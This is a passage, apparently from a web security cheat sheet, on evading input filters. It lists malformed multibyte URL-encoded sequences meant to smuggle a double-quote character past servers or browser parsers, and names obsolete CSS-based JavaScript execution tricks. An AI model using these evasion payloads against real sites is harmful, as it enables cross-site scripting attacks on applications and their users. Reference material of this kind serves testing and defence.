(The goal is to find a sequence that disrupts or confuses a parser enough that a character such as ASCII 0x22 is considered part of a multibyte sequence, but is served to the browser as a single-byte character. This would either occur because a server-side filter incorrectly stripped or rewrote the invalid sequence or the browser’s character parser misinterpreted the sequence.)
Characters: UTF-7   UTF-8   Unicode
Payload Example: -
Injection Example: %fe%22   %fd%22   %cd%22   %c1%22   %c0%a2   %80%22   %22

Technique: JavaScript execution in CSS and style definitions
[Obsolete for modern browsers due to security concerns]
Characters: -
Payload Example: -
Injection Example: IE Expressions; Mozilla -moz-binding